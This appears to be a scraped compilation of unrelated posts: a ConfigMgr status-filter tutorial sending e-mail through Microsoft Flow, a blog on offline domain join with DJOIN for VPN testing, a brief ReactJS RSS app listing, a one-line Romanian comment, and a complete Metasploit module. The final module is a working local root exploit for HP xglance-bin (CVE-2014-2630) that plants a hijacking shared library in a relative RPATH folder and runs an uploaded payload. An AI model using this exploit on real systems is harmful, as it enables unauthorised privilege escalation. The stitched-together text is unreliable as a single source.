Have you ever wished you automatically received an e-mail every time something specific happens in your ConfigMgr hierarchy, but you couldn’t find an alert or other notification option in the console? One way that many admins have accomplished this in the past is using a Status Filter Rule to run a PowerShell script which sends an e-mail to your SMTP server. This is great, but what if you want to do it expand the dynamics a bit and take other actions besides just sending an e-mail? If you haven’t yet had the chance to play with Microsoft Flow, I highly recommend checking it out. Another equivalent is called Logic Apps which are, for the most part, the same, however Flow is more geared to Office workers, business users, and Sharepoint admins, while Logic Apps has more advanced integration options available. At the end of the day, both will work for this purpose, so it’s ultimately up to you which you use, and if you know how to use one, you pretty much know how to use the other. Click here if you want to read more comparisons of the two. You get Flow free with Office 365, but if you want to hit Flow hard and plenty, you may eventually need a fancier slightly less than free version 🙂 First, browse to http://flow.microsoft.com Click My Flows, New, Automated from Blank. Enter a name for your flow in the Flow name blank. Give your new Flow a meaningful name Click Skip (you don’t need to select a trigger yet) In the search blank, enter Request and click on the Request trigger in the top window, and When a HTTP request is received in the Trigger window. In the Request Body JSON blank, enter your JSON code. In this example, we’re sending an e-mail, so we really just need a TO, a SUBJECT, and an e-mail BODY. Click Show advanced options Change the method to POST. Click New step to add a new step to your flow. Click on the Office 365 for Outlook category, and find the Send an e-mail action. Add each Dynamic content step to the appropriate fields in the Send an email step. If you don’t see all of them on the right side, look for a blue clickable See more link in the Dynamic content window to find them. Optionally, you can also click Show advanced options and change the importance of the e-mail and other settings. Click Save to save the two flow steps we created. Now if you look back at the very first step for the HTTP request, you’ll notice a URL is now provided, for example “https://prod-48.westus.logic.azure.com:443/workflows/abcdef/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=abcdef_ghijkl.” This is a Rest API URL auto-generated by Flow and unique to only this Flow that you’re creating. So keep your URL safe, be sure not to share it (unless you like surprises) and if you create another Flow, realize you won’t use the same one you’re using now :). Save your unique URL off somewhere safe for now. Now, you have two options for testing out the flow. You can put together a quick PowerShell script, or use a tool like Postman. Option 1: PowerShell $uriFlow = "https://prod-109.westus.logic.azure.com:443/workflows/blahblah" $body = @{ "subject"="Test" "body"="This is a test from Flow HTTP request" "to"="you@yourdomain.com" } | ConvertTo-Json Invoke-RestMethod -Method Post -Uri $uriFlow -Body $body -ContentType "application/json" Postman method Launch Postman, click New and Request Click Body and change the radio button to raw and pick JSON (application/json). Type up the JSON code as seen in the example below, using your To, subject, and body. Click the Send button, and you should receive an e-mail at the To address you used looking a bit like this: If all is well at this point, the only thing left to do is create some PowerShell code that sends the information you want to receive in the e-mail. What are some good examples? One possibility is, you may want to be notified when things happen in ConfigMgr. For example, every time your Software Update Point synchronizes with Microsoft and your Automatic Deployment Rule (ADR) adds updates to a Software Update Group and deploys them, you might want to know exactly what was deployed without having to go look in the console each time. So, the first step would be to figure out what Status Message ID you want. In my example, Message ID 5800 is generated each time my ADR runs and adds software updates to a Software Update Group and deploys them. However, when an administrator deploys baselines, this also generates the same 5800 Message ID, so I need to make sure I’m selective in my PowerShell script in order to filter these other CI Assignments out. Also, if you open the status message, you can decide how to customize your script based on the information you want within the status message. For example, Message ID 5800 mentions the Software Update Group which was deployed. This is useful because you can use the Get-CMSoftwareUpdateGroup CmdLet to find out what updates are in a group. I’ll use my ADR rule named OS Updates in this example. Here’s what the status message looks like when it runs and creates the Software Update Group: In your PowerShell script, the first thing you always need to do whenever utilizing ConfigMgr PowerShell cmdlets, is import the ConfigMgr PowerShell module. There are some different ways to accomplish this, and you could also dynamically pass the site code to the command-line of the PowerShell script and add a parameter to the PARAM section of the script to dynamically capture the site code as needed if you had more than one site doing this. For simplicity, I’m going to just use a single stand-alone Primary and hardcode the site code. Once we’ve picked the Status Message we want to trigger our Flow on, click Status Filter Rules to create a new one. Name it something useful, and enter the Message ID (5800 in my example): Click the Actions tab, and select the Run a program checkbox. This is where we need to enter our command-line to launch our PowerShell script. In my example, I will use the following command-line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -nologo -noprofile -executionpolicy bypass -file c:\scripts\Get-UpdateGroupContent.ps1 -Desc "%msgdesc" This assumes my script is sitting in c:\scripts and named Get-UpdateGroupContent.ps1. %msgdesc is the magic variable that corelates to the Description field in the status message. Next, move the Status Filter rule up in priority so it is somewhere higher in priority than the canned rules 14 and 15. Within the script, I needed to split up the Description value of %msgdesc to collect ONLY the information I wanted to take our next action on. In this example, if I split every word into an array with the Powershell .Split, and look at array members 8 and 9 and -join them back together, i’m left with only the Software Update Group name MINUS the date and time automatically appended to it by ConfigMgr. Set it to a variable like $DeploymentName. So I needed to scrape just the Description field out of the Status Message: CI Assignment Manager successfully processed new CI Assignment OS Updates 2019-06-26 22:01:13. And set a variable named $DeploymentName to equal OS Updates which is the actual name of my ADR. $Split = $Desc.Split(" ") $DeploymentName=($Split[8], $Split[9] -join " ") Now $DeploymentName = OS Updates, the name of my ADR. Next, I’ll check to see if the result of a Get-CMSoftwareUpdateGroup using the -Name of my $DeploymentName variable is $null or not (simply putting code into the () of an IF statement equates to “If the results of this are not NULL”) If ($SUG = Get-CMSoftwareUpdateGroup -Name "$($DeploymentName)*" | Where-Object {(Get-Date $_.DateCreated -Format D) -eq (Get-Date -Format D)}) I also don’t want to get an e-mail every time my SCEP/Defender definitions are updated, so I add a line to filter it out as well: If ($DeploymentName -notlike "*Definition*") Next, I will build a PowerShell hashtable using a PSObject and add values to its collection and set all of the variables returned by the Get-CMSoftwareUpdate using the CI_ID information to a variable called $info. You can choose any properties from the results you like. I decided the name of the update, the URL, the date it was released, and the maximum runtime setting would be most helpful. $info = @() ForEach ($item1 in (Get-CMSoftwareUpdate -UpdateGroupID $SUG.CI_ID)) { $object = New-Object -TypeName PSObject $object | Add-Member -MemberType NoteProperty -Name "Update Title" -Value $item1.LocalizedDisplayName $object | Add-Member -MemberType NoteProperty -Name URL -Value $item1.LocalizedInformativeURL $object | Add-Member -MemberType NoteProperty -Name "Date Posted" -Value $item1.DatePosted $object | Add-Member -MemberType NoteProperty -Name "Max RunTime (mins)" -Value $item1.MaxExecutionTime $info += $object } I also decided I want to apply a little CSS to beautify my e-mails a bit: $head = @" <Title>Software Updates Group Report</Title> <style> body { background-color:white; font-family:Arial; font-size:10pt; column-width:150px;} td, th { border:1px solid black; border-collapse:collapse; column-width:150px; } th { color:white; background-color:black; } table, tr, td, th { padding: 2px; margin: 0px ; } tr:nth-child(odd) {background-color: grey} table { width:95%;margin-left:0px; margin-bottom:20px;} h2 { font-family:Tahoma; color:#6D7B8D; } </style> "@ $html = $info | ConvertTo-html -Fragment | out-string So when it’s all done and your ADR runs, here’s what you get! What’s another useful way to use this capability? What about sending all administrative audit status messages up to a Sharepoint list or SQL database or Excel spreadsheet? The possibilities are endless! And finally, here’s the full script. Don’t forget to replace the $SiteCode and $uri variables to match your environment. [CmdletBinding()] param( # Software Update Group [Parameter(Mandatory = $true, ValueFromPipeline=$true)] [String] $Desc ) $SiteCode = "PRI" # Load ConfigMgr module if it isn't loaded already if (-not(Get-Module -name ConfigurationManager)) { Import-Module ($Env:SMS_ADMIN_UI_PATH.Substring(0,$Env:SMS_ADMIN_UI_PATH.Length-5) + '\ConfigurationManager.psd1') } # Change to site Push-Location Set-Location ${SiteCode}: $Split = $Desc.Split(" ") $DeploymentName=($Split[8], $Split[9] -join " ") If ($SUG = Get-CMSoftwareUpdateGroup -Name "$($Deploymentname)*" | Where-Object {(Get-Date $_.DateCreated -Format D) -eq (Get-Date -Format D)}) { If ($DeploymentName -notlike "*Definition*") { $info = @() ForEach ($item1 in (Get-CMSoftwareUpdate -UpdateGroupID $SUG.CI_ID)) { $object = New-Object -TypeName PSObject $object | Add-Member -MemberType NoteProperty -Name "Update Title" -Value $item1.LocalizedDisplayName $object | Add-Member -MemberType NoteProperty -Name URL -Value $item1.LocalizedInformativeURL $object | Add-Member -MemberType NoteProperty -Name "Date Posted" -Value $item1.DatePosted $object | Add-Member -MemberType NoteProperty -Name "Max RunTime (mins)" -Value $item1.MaxExecutionTime $info += $object } $head = @" <Title>Software Updates Group Report</Title> <style> body { background-color:white; font-family:Arial; font-size:10pt; column-width:150px;} td, th { border:1px solid black; border-collapse:collapse; column-width:150px; } th { color:white; background-color:black; } table, tr, td, th { padding: 2px; margin: 0px ; } tr:nth-child(odd) {background-color: grey} table { width:95%;margin-left:0px; margin-bottom:20px;} h2 { font-family:Tahoma; color:#6D7B8D; } </style> "@ $html = $info | ConvertTo-html -Fragment | out-string $Title = "Total assigned software updates in " + $item.LocalizedDisplayName + " = " + $info.count # Required API Variables $uri = 'https://prod-109.westus.logic.azure.com:443/workflows/abcdefg7b8b34e76a2b85a3c517fa5b4/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=abcdef5Ap7w1fEr0cMk5Z7yuo5F_JYuRabcdefg' $body = @{ "to"= "russ@russrimmerman.com"; "subject"="Software Update Group Report" "body"=$head + $html } #$body # RESTful API Call $r = Invoke-WebRequest -Uri $uri -Method Post -ContentType "application/json" -Body (Convertto-Json -InputObject $Body) } } Source russthepfe.com
-
It’s been a few months since I’ve sat down to put write something. I’ve been taking a break trying to pick up some woodworking skills and spend a bit more time with the family during this COVID-19 lockdown. On March 5, I left work to take a week off for Spring Break and never returned to the office. Today is May 5. I wasn’t prepared for being at home and since I don’t regularly work from home, I don’t have any hardware here other than a normal desk setup. At the office, we have a build lab and I have access to numerous hardware models that I can test with. At home, I just have my company-issued laptop and a VPN connection, which is generally fine for the few days per month that I’m actually working from home. We have a VMWare build farm as well where I generally do most of my image builds and testing unless I need to test drivers or other device specific things. One thing that our VMWare farm doesn’t have is direct internet access – we only have a business network VLAN, which makes it impossible to test VPN-related things (split-tunneling, Cloud Management Gateway, internet-only clients, etc.). More on Split-Tunneling and Microsoft Updates from ConfigMgr here from @RobDotYork and @MikeTerrill https://techcommunity.microsoft.com/t5/configuration-manager-blog/managing-remote-machines-with-cloud-management-gateway-in/ba-p/1233895 https://techcommunity.microsoft.com/t5/configuration-manager-blog/managing-patch-tuesday-with-configuration-manager-in-a-remote/ba-p/1269444 https://miketerrill.net/2020/03/18/forcing-configuration-manager-vpn-clients-to-get-patches-from-microsoft-update/ The Problem So here I am, stuck at home, with a mandate from management to get split-tunneling working to reduce VPN bandwidth for Microsoft Updates, with no way to test other than my primary device – which is never fun to do. So I started thinking. I had just spun up Hyper-V to build a new ConfigMgr lab for some Intune testing so I decided to see if I could somehow use build a new VM to our standards that I could test VPN on. The semi-obvious answer would be to use AutoPilot, except I would need line-of-sight to the domain controller for hybrid-join to work and we are just beginning to get Intune configured in production (see note about lab build above…). Our VPN client requires user domain credentials and a valid computer certificate issued from our CA in order to connect. The domain credentials are easy, the client certificate, not so much. So I started playing around with DJOIN and had a breakthrough. I’ve never needed to use DJOIN so this was a cool learning experience for me. So if you want to see what I was able to do, keep reading. The Plan Here are the steps I’ll be going through: Use DJOIN on Domain Joined device to create offline join blob Use DJOIN to “install” the offline blob on a new clean VM Install the company VPN client Install the ConfigMgr client Run our standard OSD Task Sequence in Apps-Only mode to standardize the VM DJOIN Provision If you’ve ever looked at logs during OSD, you’ve likely seen references to DJOIN – that’s pretty much where my experience with DJOIN ends. SetupAct.Log from the Panther folder As I started playing with it I discovered that it is a very powerful tool capable of not only creating an offline domain joined object, but you can specify the OU, certificate template and more. It was like finding a Swiss Army Knife while on a desert island. You can read more about DJOIN here https://docs.microsoft.com/en-us/previous-vhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff793312(v=ws.11)ersions/windows/it-pro/windows-server-2012-r2-and-2012/ff793312(v=ws.11) You can look up the parameter info on the link above, but essentially this command line will do the following: /PROVISION /DOMAIN – Join the domain /MACHINE – Specify the device name /MACHINEOU – Put the device in a specific OU, /SAVEFILE – Save to a file /CERTTEMPLATE – Generate a computer auth cert using our domain computer template /REUSE – Reuse the device name if it exists Provision.cmd DJOIN /PROVISION /DOMAIN "asd.net" /MACHINE "ASD-MyVM1" /MACHINEOU "CN=Computers,DC=asd,DC=net" /SAVEFILE "C:\Temp\ASD-MyVM1_ODJ.txt" /CERTTEMPLATE "ASD-DomainComputerTemplate" /REUSE Once you run this command, you can check Active Directory and you should see your new computer in the OU that you specified and you’ll have a text file in the /SAVEFILE location. RequestODJ STOP! Ensure that you have a local Admin account on the target device at this stage. If you don’t, you won’t be able to use admin rights after this step. Also, you could choose to install your VPN client before this step, but I’m doing it afterwards. Doesn’t make a huge difference. As mentioned, you’ll need a new, clean device. I used Hyper-V but this will work with a VM or physical device. You can do this by using DISM to mount a WIM and running the commands (exclude /LOCALOS) or spin up the device the run the command from the new device (Include /LOCALOS). Simply copy your Offline Domain Join (ODJ) text file to the new device and run the following: /REQUESTODJ – Tells the device to request an offline domain join on the next restart /LOADFILE – specifies the ODJ blob file that you generated with /PROVISION /WINDOWSPATH – the path to Windows for an offline image or if used with /LOCALOS the windows directory of the device you are running the command on. /LOCALOS – targets the local OS RequestODJ.cmd DJOIN /REQUESTODJ /LOADFILE c:\Temp\ASD-MyVM1_OSJ.txt /WINDOWSPATH %SystemRoot% /LOCALOS Once you run the command, reboot the device and you’ll be prompted to log in with your domain credentials. Since you won’t be on the domain yet, log back in with your local admin credentials. To verify that this all worked, you can check Computer Management to see that you’re on the domain and check your Local Computer personal certificate store and see that you have a domain CA cert issued to the device name that you specified and the root and intermediate certs should be there as well. VPN This is the part that may be a show stopper for you, depending on the type of VPN you use and the auth requirements for it. I got lucky with the device cert and user domain creds. At this point, you simply want to install your company VPN client and configure it properly. Since everyone will have something different, I’m not going to go into details. In my case, once the client was installed from an MSI, I was able to connect to the VPN portal and sign in with my domain credentials, using the device certificate in the background as well. Once I establish the tunnel successfully the first time, the VPN client is ready to go. I can reboot the machine, then log in with my domain credentials and I’m on! That’s pretty much it From here, what you do is up to you. You should have a computer that’s domain joined and on VPN. For me, I wanted to test using a device that matched our standard build. If you don’t need to do this, then you can pretty much stop here. Standardizing the Image If you want to complete your build, you will need to manually install the ConfigMgr client using the command lines appropriate to your site. From a domain connected device, copy the client installation media to the new device. Once installed, drop the machine into a collection that has your “Apps-Only” Task Sequence (keep reading) advertised to it and run it once it shows up. If you’ve read any of my Task Sequence blogs, you may have come across my “Building a Smarter Task Sequence” post. In it, I detail how to build a OS Deployment Task Sequence that is able to be re-run on failed devices without reinstalling the whole OS. You may also be able to just break out everything after the Setup Windows and ConfigMgr step in your Task Sequence and create a new “Apps-Only” sequence that will finish installing all of the bits that make up your company’s standard build. This would be equivalent the Task Sequence you’d want to build if you use the new PROVISIONTS commandline option in ConfigMgr 2002 to auto launch a Task Sequence right after the ConfigMgr client is installed via AutoPilot. Ultimately, if you have Windows on the box, everything else SHOULD just be apps and policies. Now, if you are offline servicing and doing a bunch of tweaking to your image or even using a reference image, you may not end up quite standard. We don’t do any of that, so this process is perfect. I just need to install a few standard apps and add a registry key to tag this as a standard build and my device should match anything we’ve built from bare metal. Give It A Spin Once you’ve built your new machine, you should have a device that looks like any other standard device. I was able to spin up several Hyper-V VMs using this process and successfully tested several VPN scenarios to validate our split-tunnel configuration, which made all of the effort worth it. I’m sure there is more to learn about DJOIN but this is what I’ve learned so far. Hope you find some inspiration in this. Soapbox I’ve been saying this to anyone who will listen for the past few years and I have been fighting to make this a reality in my production environment as well – the less you bake into your image and the less you customize your builds, the easier it will be to move to AutoPilot or an Apps-Only TS model that allows you to take advantage of the OS already being on the box. There are MANY reasons why this is an unattainable goal for many orgs, but you I challenge you to keep chipping away at your customizations to deliver a vanilla image that could easily be replicated by installing some apps and applying some policies. It’s a worthwhile endeavor and I’m very glad that we are on a journey to zero (or as close as we can get to zero) customizations. Source asquaredozen.com
-
DatoRSS Search Engine small application developed in ReactJS that uses the API provided by FeediRSS API Live www.datorss.com Run npm install, npm start Download datorss-master.zip or git clone https://github.com/davidesantangelo/datorss.git Credit: Davide Santangelo Source
-
Incearca sa formatezi text-ul, nu se observa nimic pe tema default
-
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'HP Performance Monitoring xglance Priv Esc', 'Description' => %q{ This exploit takes advantage of xglance-bin, part of HP's Glance (or Performance Monitoring) version 11 'and subsequent' , which was compiled with an insecure RPATH option. The RPATH includes a relative path to -L/lib64/ which can be controlled by a user. Creating libraries in this location will result in an escalation of privileges to root. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Tim Brown', # original finding 'Robert Jaroszuk', # exploit 'Marco Ortisi', # exploit ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Automatic', {} ], [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X64 } ] ], 'Privileged' => true, 'References' => [ [ 'EDB', '48000' ], [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ], [ 'PACKETSTORM', '156206' ], [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ], [ 'CVE', '2014-2630' ] ], 'DisclosureDate' => 'Nov 19 2014', 'DefaultTarget' => 0 ) ) register_options [ OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ]) ] register_advanced_options [ OptBool.new('ForceExploit', [ false, 'Override check result', false ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def exploit_folder "#{base_dir}/-L/lib64/" end def glance_path datastore['GLANCE_PATH'].to_s end # Pull the exploit binary or file (.c typically) from our system def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file) end def find_libs libs = cmd_exec "ldd #{glance_path} | grep libX" %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs return nil if lib.nil? lib end def check unless setuid? glance_path vprint_error "#{glance_path} not found on system" return CheckCode::Safe end lib = find_libs if lib.nil? vprint_error 'Patched xglance-bin, not linked to -L/lib64/' return CheckCode::Safe end vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}" CheckCode::Appears end def exploit unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # delete exploit folder in case a previous attempt failed vprint_status("Deleting exploit folder: #{base_dir}/-L") rm_cmd = "rm -rf \"#{base_dir}/-L\"" cmd_exec(rm_cmd) # make folder vprint_status("Creating exploit folder: #{exploit_folder}") cmd_exec "mkdir -p #{exploit_folder}" register_dir_for_cleanup "#{base_dir}/-L" # drop our .so on the system that calls our payload # we need gcc to compile instead of metasm since metasm # removes unused variables, which we need to keep xglance-bin # from breaking and not launching our exploit so_file = "#{exploit_folder}libXm.so.3" if live_compile? vprint_status 'Live compiling exploit on system...' payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" code = exploit_data('CVE-2014-2630.c') code.sub!('#{payload_path}', payload_path) # inject our payload path upload_and_compile so_file, code, '-fPIC -shared -static-libgcc' rm_f "#{so_file}.c" else payload_path = '/tmp/.u4aLoiq' vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx so_file, exploit_data('libXm.so.3') end # Upload payload executable vprint_status 'uploading payload' upload_and_chmodx payload_path, generate_payload_exe # link so files to exploit vuln lib = find_libs # just to be safe, Xt and Xp were in the original exploit # our mock binary is also exploitsable through libXmu.so.6 # unsure about the real binary cd exploit_folder ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l| cmd_exec "ln -s libXm.so.3 #{l}" end # Launch exploit print_status 'Launching xglance-bin...' cd base_dir output = cmd_exec glance_path output.each_line { |line| vprint_status line.chomp } print_warning("Manual cleanup of #{exploit_folder} may be required") end end Author: Tim Brown Source